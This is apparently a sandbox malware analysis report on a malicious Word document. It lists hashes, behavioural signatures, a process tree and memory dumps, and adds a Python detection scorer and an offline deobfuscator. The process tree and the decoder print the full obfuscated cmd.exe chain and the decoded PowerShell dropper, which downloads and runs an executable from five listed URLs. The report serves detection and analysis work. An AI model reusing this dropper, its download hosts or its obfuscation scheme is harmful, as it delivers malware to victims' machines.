Analysis

  • max time kernel
    112s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 00:37

General

  • Target

    ab37d198e0a1aa5ea37a6a4ebfccf8f6f175f3e97f77261b9a4813a4c7e2c1c4.doc

  • Size

    141KB

  • MD5

    d2cc5525e1d27ab1814bf89562efd8d9

  • SHA1

    278d0e253423ba2e83f1b3851465251c209a8580

  • SHA256

    ab37d198e0a1aa5ea37a6a4ebfccf8f6f175f3e97f77261b9a4813a4c7e2c1c4

  • SHA512

    59725072fd48b6853e938ad289b8fe893fa48f61a0a0f5e3c377ba85f63514b55577b78e6bf7a3bd32b8d46a5f400805b64dd51965ed431f76a2d19a46a01191

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper: http://www.niteshagrico.com/z7ISltpB
    exe.dropper: http://www.tenmiengiarenhat.com/bIfcRi8Kc
    exe.dropper: http://www.hopeintlschool.org/ebIV1do
    exe.dropper: http://www.dnenes.com.mx/Wmv9Lwru
    exe.dropper: http://kynangtuhoc.com/h6pTDOH

Signatures

  • Process spawned unexpected child process (1 IoC)

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request (5 IoCs)
  • Drops file in Windows directory (1 IoC)
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings (1 TTP, 9 IoCs)
  • Modifies registry class (64 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of FindShellTrayWindow (2 IoCs)
  • Suspicious use of SetWindowsHookEx (2 IoCs)
  • Suspicious use of WriteProcessMemory (24 IoCs)
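The "Process spawned unexpected child process" signature fires on the WINWORD.EXE to cmd.exe hop in the tree below, but the command line itself carries stronger evidence than the parent/child pair: environment-variable slicing (`%VAR:~start,len%`), `/v:` delayed expansion with a chain of `!VAR:old=new!` edits, escape carets, and an `echo %VAR% | cmd` self-pipe. The scorer below is an added example (not part of the sandbox report and not a vendor rule) that runs those checks over process-creation events. The event list is constructed for the example: the first command line is an abridged copy of the WINWORD child from this report (the PowerShell payload between the `sET WtOF=` seed and the replacement chain is elided), the other three are benign controls, and the weights and 50-point threshold are assumptions chosen for illustration.

```python
import re

# Office hosts that should not normally launch an interpreter, and the interpreters
# and proxy-execution binaries a macro typically reaches for (assumed lists).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "regsvr32.exe", "rundll32.exe", "certutil.exe", "msiexec.exe"}

SUBSTRING_RE = re.compile(r"%\w+:~-?\d+(?:,-?\d+)?%")      # %VAR:~start,len% character picking
REPLACE_RE = re.compile(r"!\w+:[^=!]+=[^!]*!")            # !VAR:old=new! delayed-expansion edits
DELAYED_RE = re.compile(r"/v:", re.I)                      # cmd /V: switches the !VAR! syntax on
SELF_PIPE_RE = re.compile(r"echo\s+%\w+%\s*\|", re.I)     # echo %VAR% | <interpreter>

# Constructed sample events in the shape of the process tree in this report.
SAMPLE_EVENTS = [
    {   # abridged copy of the WINWORD child (PID 524) from the report; "..." elides the payload
        "parent": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
        "image": r"C:\Windows\SysWOW64\cmd.exe",
        "cmdline": r'"C:\Windows\system32\cmd.exe" /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2% /v: /R '
                   r'" sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^% EMP:~-3W31^%ll ... '
                   r'&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !'
                   r'&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D "',
    },
    {   # the print helper Word also spawned (PID 2036): Office parent, but not an interpreter
        "parent": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
        "image": r"C:\Windows\splwow64.exe",
        "cmdline": r"C:\Windows\splwow64.exe 12288",
    },
    {   # benign control: a single substring expansion from a user shell (constructed)
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": r'"C:\Windows\system32\cmd.exe" /c echo %DATE:~0,4%',
    },
    {   # benign control: plain PowerShell from a user shell (constructed)
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -NoProfile -Command Get-Date",
    },
]


def basename(path):
    """Lower-cased file name of an image path, tolerant of quotes and forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def score_event(event):
    """Return (score, reasons) for one process-creation event (assumed weights)."""
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    score, reasons = 0, []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        score += 40
        reasons.append(f"{parent} spawned {image}")
    n_sub = len(SUBSTRING_RE.findall(cmd))
    if n_sub >= 2:          # one slice is common in scripts; several in a row builds a word
        score += 20
        reasons.append(f"{n_sub} environment-variable substring expansions")
    n_rep = len(REPLACE_RE.findall(cmd))
    if n_rep >= 3 and DELAYED_RE.search(cmd):
        score += 20
        reasons.append(f"{n_rep} delayed-expansion string replacements")
    if SELF_PIPE_RE.search(cmd):
        score += 15
        reasons.append("echoes a variable into a second interpreter")
    carets = cmd.count("^")
    if carets >= 5:
        score += 5
        reasons.append(f"{carets} escape carets")
    return score, reasons


def triage(events, threshold=50):
    """Return (score, reasons, event) for events at or above threshold, highest first."""
    hits = [(s, r, e) for e in events for (s, r) in [score_event(e)] if s >= threshold]
    hits.sort(key=lambda t: t[0], reverse=True)
    return hits


if __name__ == "__main__":
    for score, reasons, event in triage(SAMPLE_EVENTS):
        print(score, basename(event["parent"]), "->", basename(event["image"]))
        for reason in reasons:
            print("   ", reason)
```

The command-line features are weighted separately from the parent/child pair on purpose: the second cmd.exe in the tree (PID 432, spawned by cmd.exe rather than by Word) still scores on the `/v:` replacement chain and the self-pipe, so the rule keeps firing once the Office parent is out of the picture.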

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ab37d198e0a1aa5ea37a6a4ebfccf8f6f175f3e97f77261b9a4813a4c7e2c1c4.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2036
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2% /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^% EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p [O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres? unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres? unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D "
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:524
        • C:\Windows\SysWOW64\cmd.exe
          CmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^% EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p [O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres? unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres? unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:432
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" ecHO %3fr% "
            4⤵
              PID:344
            • C:\Windows\SysWOW64\cmd.exe
              cmD
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1400
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell $onlinewt='moderatorvr';$InvestmentAccountos=new-object Net.WebClient;$Ergonomicvs='http://www.niteshagrico.com/z7ISltpB@http://www.tenmiengiarenhat.com/bIfcRi8Kc@http://www.hopeintlschool.org/ebIV1do@http://www.dnenes.com.mx/Wmv9Lwru@http://kynangtuhoc.com/h6pTDOH'.Split('@');$GroceryAutomotiveAutomotivews='ROIso';$SmallFreshTunaaj = '224';$MoneyMarketAccountir='plugandplaywz';$HeardIslandandMcDonaldIslandski=$env:public+'\'+$SmallFreshTunaaj+'.exe';foreach($depositpq in $Ergonomicvs){try{$InvestmentAccountos.DownloadFile($depositpq, $HeardIslandandMcDonaldIslandski);$generatingjk='initiativeshi';If ((Get-Item $HeardIslandandMcDonaldIslandski).length -ge 80000) {Invoke-Item $HeardIslandandMcDonaldIslandski;$PersonalLoanAccountrf='Automotivevz';break;}}catch{}}$paradigmsdc='IncredibleConcreteKeyboardal';
                5⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:848
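The three cmd.exe generations above are one obfuscation scheme: the first instance (PID 524) assembles the word `CmD` and later `cmD` by slicing `%ProgramData%`, `%TMP%` and `%AppData%`; the second (PID 432) runs under `/v:` delayed expansion and rebuilds the PowerShell text from the `WtOF` seed with sixteen `!VAR:old=new!` substitutions; `echo %3fr%` (PID 344) emits the result with its escape carets stripped, and the cmd.exe reading the pipe (PID 1400) expands the remaining `%PUBLIC%`, `%SESSIONNAME%` and `%TEMP%` slices into `powershell` before launching PID 848. The decoder below is an added example, not tooling from the sandbox or the report, that replays those stages offline. The captured command line is copied verbatim from PID 432 above; the environment values are assumed Windows 7 x64 defaults for a user named Admin, which the report does not list.

```python
import re

# Command line the sandbox recorded for the second cmd.exe (PID 432), copied from the
# process tree above and split into adjacent string literals only for readability.
CAPTURED_PID_432 = (
    r'CmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^% EMP:~-3W31^%llC6'
    r"$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;"
    r"$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@"
    r"?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p [O_'.SplinY('@');"
    r"$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres? unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';"
    r"$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres? unaa`+'.exe';"
    r"forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);"
    r"$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;"
    r"$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';"
    r"&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!"
    r"&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!"
    r'& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD "'
)

# Assumed values for the variables the dropper slices: typical Windows 7 x64 defaults for a
# user named Admin. The report does not list them; adjust for another sandbox image.
ASSUMED_ENV = {
    "PROGRAMDATA": r"C:\ProgramData",
    "PUBLIC": r"C:\Users\Public",
    "SESSIONNAME": "Console",
    "TEMP": r"C:\Users\Admin\AppData\Local\Temp",
    "TMP": r"C:\Users\Admin\AppData\Local\Temp",
    "APPDATA": r"C:\Users\Admin\AppData\Roaming",
}

SEED_RE = re.compile(r"\bset\s+(\w+)=([^!&][^&]*)", re.I)          # set WtOF=<literal seed>
STEP_RE = re.compile(r"\bset\s+(\w+)=!(\w+):([^=]+)=([^!]*)!", re.I)  # set X=!Y:old=new!
ECHO_RE = re.compile(r"\becho\s+%(\w+)%", re.I)                     # echo %VAR% | ...
PCT_RE = re.compile(r"%(\w+)(?::~(-?\d+)(?:,(-?\d+))?)?%")        # %VAR% or %VAR:~start,len%


def cmd_substring(value, start, length=None):
    """Emulate %VAR:~start,len%: a negative start counts from the end, a negative len
    drops that many characters from the end, and a missing len means 'to the end'."""
    n = len(value)
    s = min(start if start >= 0 else max(n + start, 0), n)
    if length is None:
        e = n
    elif length >= 0:
        e = min(s + length, n)
    else:
        e = max(n + length, s)
    return value[s:e]


def expand_percent(text, env=ASSUMED_ENV):
    """Expand %VAR% references the way an interactive cmd.exe does: variable names are
    case-insensitive and an undefined variable is left in place (a batch file would drop it)."""
    def repl(m):
        name, start, length = m.group(1), m.group(2), m.group(3)
        value = env.get(name.upper())
        if value is None:
            return m.group(0)
        if start is None:
            return value
        return cmd_substring(value, int(start), None if length is None else int(length))
    return PCT_RE.sub(repl, text)


def replay_set_chain(cmdline):
    """Replay every 'set X=!Y:old=new!' step in order. cmd matches 'old' case-insensitively,
    so the emulation must too, or a sample whose alphabet collides would decode differently."""
    seed = SEED_RE.search(cmdline)
    if seed is None:
        raise ValueError("no 'set VAR=<literal>' seed found")
    variables = {seed.group(1): seed.group(2)}
    steps = []
    for dst, src, old, new in STEP_RE.findall(cmdline):
        variables[dst] = re.sub(re.escape(old), lambda _m, new=new: new, variables[src], flags=re.I)
        steps.append((dst, src, old, new))
    return variables, steps


def deobfuscate(cmdline, env=ASSUMED_ENV):
    """Recover the command the final 'echo %VAR% | cmd' stage hands to its child."""
    variables, _steps = replay_set_chain(cmdline)
    echoed = variables[ECHO_RE.search(cmdline).group(1)]
    # echo writes the value with escape carets removed ('^%' becomes '%'); the cmd.exe that
    # reads the pipe then performs the percent expansion the carets had deferred.
    return expand_percent(echoed.replace("^", ""), env)


def dropper_urls(powershell):
    """Pull the '@'-separated download URLs out of the recovered PowerShell."""
    return re.findall(r"https?://[^'@\s]+", powershell)


if __name__ == "__main__":
    print(expand_percent("%PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2%"))   # how PID 524 spelled "CmD"
    recovered = deobfuscate(CAPTURED_PID_432)
    print(recovered)
    for url in dropper_urls(recovered):
        print("  ", url)
```

The decoder models the pipeline the process tree shows rather than cmd's full parser (which does percent expansion before it removes carets, and which this sample sidesteps by keeping the `%PUBLIC%` slices malformed until the last stage). Two details matter when adapting it to other samples: the substitutions are applied in command order and are case-insensitive, as they are in cmd, and the sliced environment variables depend on the victim's profile, so a different `%PUBLIC%` or `%SESSIONNAME%` (an RDP session is not `Console`) would not spell `powershell` and the chain would fail on that host.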

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion
    Modify Registry (T1112): 1


Downloads

  • memory/344-65-0x0000000000000000-mapping.dmp
  • memory/432-64-0x0000000000000000-mapping.dmp
  • memory/524-63-0x0000000000000000-mapping.dmp
  • memory/848-70-0x0000000004BA0000-0x00000000051F1000-memory.dmp (6.3MB)
  • memory/848-69-0x000000006AB20000-0x000000006B0CB000-memory.dmp (5.7MB)
  • memory/848-67-0x0000000000000000-mapping.dmp
  • memory/1400-66-0x0000000000000000-mapping.dmp
  • memory/1752-58-0x00000000750C1000-0x00000000750C3000-memory.dmp (8KB)
  • memory/1752-62-0x00000000007C7000-0x00000000007E8000-memory.dmp (132KB)
  • memory/1752-61-0x00000000007C7000-0x00000000007E8000-memory.dmp (132KB)
  • memory/1752-54-0x0000000072671000-0x0000000072674000-memory.dmp (12KB)
  • memory/1752-57-0x00000000710DD000-0x00000000710E8000-memory.dmp (44KB)
  • memory/1752-56-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)
  • memory/1752-55-0x00000000700F1000-0x00000000700F3000-memory.dmp (8KB)
  • memory/1752-71-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)
  • memory/2036-60-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp (8KB)
  • memory/2036-59-0x0000000000000000-mapping.dmp